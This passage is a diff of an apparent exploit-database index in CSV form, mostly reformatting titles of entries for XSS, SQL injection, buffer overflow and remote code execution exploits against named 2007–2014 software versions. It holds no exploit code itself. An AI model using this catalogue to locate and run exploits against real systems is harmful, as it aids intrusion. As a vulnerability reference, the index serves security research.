Auriemma",multiple,remote,0 +30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote,0 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - Index.php Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x - Index.php Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 @@ -27579,17 +27574,17 @@ id,file,description,date,author,platform,type,port 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 -30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 +30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - login.php mode Parameter XSS",2007-10-05,"Ivan Sanchez",php,webapps,0 30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - default.asp mode2 Parameter XSS",2007-10-05,"Ivan Sanchez",php,webapps,0 30643,platforms/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote,0 30644,platforms/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos,0 30645,platforms/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0 -30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",linux,dos,0 +30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",linux,dos,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - News_page.php Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos,0 -30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 -30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 +30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 +30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - Setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 @@ -27610,7 +27605,7 @@ id,file,description,date,author,platform,type,port 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30669,platforms/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilities",2014-01-03,"mohamad ch",windows,webapps,0 30865,platforms/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,php,webapps,0 -30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 +30795,platforms/cgi/webapps/30795.txt,"GWExtranet - Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 @@ -27622,7 +27617,7 @@ id,file,description,date,author,platform,type,port 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter XSS",2007-10-15,JosS,jsp,webapps,0 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP Softphone 2050 RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 -30679,platforms/hardware/dos/30679.pl,"Nortel Networks Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 +30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Local Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Local Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 @@ -27657,8 +27652,8 @@ id,file,description,date,author,platform,type,port 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.ASP SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums - Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 -30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 -30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 +30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 +30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 @@ -27666,14 +27661,14 @@ id,file,description,date,author,platform,type,port 30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - Example.php SQL Injection",2007-10-29,netVigilance,php,webapps,0 30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 - ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,windows,remote,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 -30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 +30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 -30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 +30724,platforms/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 -30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",linux,remote,0 +30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 - GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console - URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - Index.php Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 @@ -27691,7 +27686,7 @@ id,file,description,date,author,platform,type,port 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.ASP Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 30744,platforms/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service",2007-11-05,"Joe Gallo",linux,dos,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps,0 -30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 +30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified - AgencyCatResult.ASP SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos,0 @@ -27708,7 +27703,7 @@ id,file,description,date,author,platform,type,port 30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 -30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 +30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 @@ -27716,9 +27711,9 @@ id,file,description,date,author,platform,type,port 30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness",2007-11-15,anonymous,multiple,remote,0 30769,platforms/php/webapps/30769.txt,"Nuked-Klan 1.7.5 - File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 -30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0 +30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 -30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 +30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - .MDB File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - Login.ASP Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 @@ -27743,9 +27738,9 @@ id,file,description,date,author,platform,type,port 30814,platforms/multiple/dos/30814.txt,"Skype 3.6.216 - Voicemail URI Handler Remote Denial of Service",2007-11-26,"Critical Security",multiple,dos,0 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 30816,platforms/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote,0 -30817,platforms/php/webapps/30817.html,"Liferay Portal 4.3.1 Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps,0 -30818,platforms/cgi/webapps/30818.txt,"ht://Dig 3.2 Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps,0 -30819,platforms/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote,0 +30817,platforms/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps,0 +30818,platforms/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps,0 +30819,platforms/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote,0 30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - incphp/globals.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - plugins/export/mc_table.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 @@ -27763,7 +27758,7 @@ id,file,description,date,author,platform,type,port 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - Adresses/Ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0 -30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos,0 +30837,platforms/linux/dos/30837.txt,"QEMU 0.9 - Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Local Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String",2007-12-04,"SEC Consult",windows,dos,0 @@ -27778,7 +27773,7 @@ id,file,description,date,author,platform,type,port 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component - index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 -30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 +30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 - Compose.php Cross-Site Scripting",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 - Clickstats.php Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injection",2007-12-07,Chrysalid,asp,webapps,0 @@ -27793,15 +27788,15 @@ id,file,description,date,author,platform,type,port 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 - register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 30885,platforms/multiple/dos/30885.txt,"QK SMTP Server - Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 -30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 +30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 -30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 -30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0 +30893,platforms/php/webapps/30893.txt,"PHP Security Framework - Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 +30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 - HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0 30895,platforms/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service",2007-12-17,beSTORM,linux,dos,0 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service",2007-12-17,"Chris Castaldo",multiple,dos,0 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,windows,remote,0 @@ -27885,7 +27880,7 @@ id,file,description,date,author,platform,type,port 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 -30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 +30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - admin.php CSRF",2008-01-07,L4teral,php,webapps,0 @@ -27917,14 +27912,14 @@ id,file,description,date,author,platform,type,port 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps,0 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote,0 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI Security Bypass",2008-01-16,nnposter,hardware,remote,0 -31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0 +31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 / uTorrent 1.6/1.7 - Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0 -31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0 +31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 @@ -27936,9 +27931,9 @@ id,file,description,date,author,platform,type,port 31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection",2008-01-22,RawSecurity.org,php,webapps,0 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,php,webapps,0 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 -31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 +31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - chrome:// URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 -31053,platforms/php/remote/31053.php,"PHP 5.2.5 cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 +31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 @@ -27977,17 +27972,17 @@ id,file,description,date,author,platform,type,port 31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 31093,platforms/php/webapps/31093.txt,"ITechClassifieds - ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 31094,platforms/php/webapps/31094.txt,"ITechClassifieds - ViewCat.php CatID Parameter XSS",2008-02-02,Crackers_Child,php,webapps,0 -31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 +31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess - Multiple Cross-Site Scripting 